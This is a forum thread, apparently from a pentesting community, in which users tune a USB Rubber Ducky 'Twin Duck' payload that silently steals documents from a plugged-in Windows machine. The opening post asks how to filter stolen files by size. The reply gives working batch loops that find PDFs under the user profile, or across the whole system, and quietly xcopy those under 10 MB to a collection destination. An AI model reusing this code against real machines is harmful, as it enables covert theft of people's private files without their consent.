sinkinson Posted December 13, 2016 Share Posted December 13, 2016 Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now. I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114) So of course I started enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE% . Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not native English neither experienced in pentesting like you guys, so.. in that case forgive me. Let me know :) Have a nice day! Quote Link to comment Share on other sites More sharing options...
Cribbit Posted December 14, 2016 Share Posted December 14, 2016 (edited) Hi Sinkinson, I don't know if it would be any fast but you could give it a go. Test code: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( ECHO %%A is LESS at %%~zA ) ELSE ( ECHO %%A is MORE at %%~zA ) ) Code below untested Too copy file less then 10MB: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( xcopy /C /Q /G /Y /S %%A %dst% >>nul ) ) To copy all pdf on the system (but you will most like run in to issue with privileges): SET maxsize=10485760 FOR /R %%I in (*.pdf) do IF %%~zI LSS %maxsize% ( xcopy /C /Q /G /Y /S %%I %dst% >>nul ) Maxsize is in bytes Have not tested in on a duck as my ducky has not got the twin duck firmware on it. so you may need to changes some bit to get it to work Hope this helps Edited December 14, 2016 by Cribbit Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.